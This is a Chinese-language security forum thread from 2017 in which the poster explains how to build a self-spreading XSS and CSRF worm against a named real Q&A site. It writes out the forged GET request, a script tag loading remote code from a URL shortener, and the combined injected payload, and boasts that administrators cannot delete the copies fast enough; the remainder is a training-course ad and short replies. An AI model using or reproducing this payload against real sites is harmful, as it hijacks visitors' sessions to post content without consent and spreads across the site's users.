用户
搜索
  • TA的每日心情

    2017-5-28 08:43
  • 签到天数: 4 天

    连续签到: 1 天

    [LV.2]偶尔看看

    安全团队

    会是一回事,用又是一回事。

    Rank: 7Rank: 7Rank: 7

    59

    主题

    147

    帖子

    1437

    魔法币
    收听
    0
    粉丝
    17
    注册时间
    2016-9-4

    i春秋认证

    诚殷网络论坛 安全团队 会是一回事,用又是一回事 i春秋认证 楼主
    发表于 2017-4-9 20:36:15 1625331
    本帖最后由 春秋文阁负责人 于 2017-8-12 17:47 编辑

    在这里为大家再次献上一贴,还记得当年的新浪微博蠕虫吗?
    今天小编为大家献上一个全自动病毒式推广的案例。

    101347uirxmdcmtra3x4t3.jpg

    102025fwp57q9v5e55jlp5.jpg

    首先蠕虫需要xss+csrf相互结合,才能起到一个最终蠕虫病毒的效果

    101659ggm992mbarrrmff2.jpg

    发表了一个问题,可以看到图中是用的post形式来进行一个数据传输

    101700m8did49ichfqzfoz.jpg

    我们将其改为一个get形式,请看图中的操作

    101701xhmkcmekoeokwosa.jpg

    最后得到了一个连接地址,只要别人点击了这个链接,就会自动发送信息
    [AppleScript] 纯文本查看 复制代码
    http://www.chinacyccxcom/Home/Questions/submitUserQuestion/iffromuserhome/true.html?professionsListSelect=37&questionTitleTxt=1&questionBodyTxtarea=1111111111&jifenTxt=0&hdnTeacherId=0&hdnProfessionId=37&hdnCategoryId=1
    这样一个csrf链接,我们就构造好了,现在我们需要一个xss漏洞来辅助我们、



    我们将其插入到内容中,这样别人一浏览我们的问题,就会自动发表一个提问,我们可以将提问的内容改为csrf+xss的集合体。请看下面

    102636gj738qr33sjc7cjr.jpg

    我们将这段url缩短(csrf的)
    • [AppleScript] 纯文本查看 复制代码
      <script src=http://980.so/44lK9o></script>




    然后我们将这段xss代码插入到csrf内容中
    • [AppleScript] 纯文本查看 复制代码
      http://www.chinacycc.com/Home/Questions/submitUserQuestion/iffromuserhome/true.html?professionsListSelect=37&questionTitleTxt=1&questionBodyTxtarea=<script[/url] src=http://980.so/44lK9o></script>&jifenTxt=0&hdnTeacherId=0&hdnProfessionId=37&hdnCategoryId=1




    在将楼上这段链接,进行缩短
    • [AppleScript] 纯文本查看 复制代码
      http://980.so/2KSO5A




    接着我们将缩短后的url再次变为
    • [AppleScript] 纯文本查看 复制代码
      <script src=http://980.so/2KSO5A></script>




    这个时候将这段代码插入到内容中,一段蠕虫繁衍就开始了。到时候管理员删都删不完。
    第一个人发表,第二个人看了,第二个发表。跟传销差不多

    echo "技术本不难,难见有心人,诚殷网络WEB渗透培训让你从另一个角度学习渗透!";
    前来膜拜前来膜拜前来膜拜前来膜拜前来膜拜前来膜拜
    使用道具 举报 回复
    cccccccccccccccccccccccccccccccccccc
    使用道具 举报 回复
    头一次接触这个,思路记下了,邪邪分享
    使用道具 举报 回复
    继续学习中   方法不错
    使用道具 举报 回复
    熟悉熟悉  學習學習
    使用道具 举报 回复
    发表于 2017-4-10 09:06:46
    好吧第一遍没看懂,排版很重要
    使用道具 举报 回复
    发表于 2017-4-9 21:29:46
    明白的。。。。。
    不说话不代表默认
    使用道具 举报 回复

    明白的。。。。。
    使用道具 举报 回复
    发表于 2017-4-10 09:12:47
    来学习学习
    使用道具 举报 回复
    发表于 2017-4-10 09:35:38
    如果您要查看本帖
    使用道具 举报 回复
    学习一下
    使用道具 举报 回复
    发表于 2017-4-10 18:18:54
    前排瞻仰
    使用道具 举报 回复
    666666666666666666
    使用道具 举报 回复
    发表于 2017-4-12 13:19:20
    使用道具 举报 回复
    发表于 2017-4-13 11:19:36
    6666666666
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册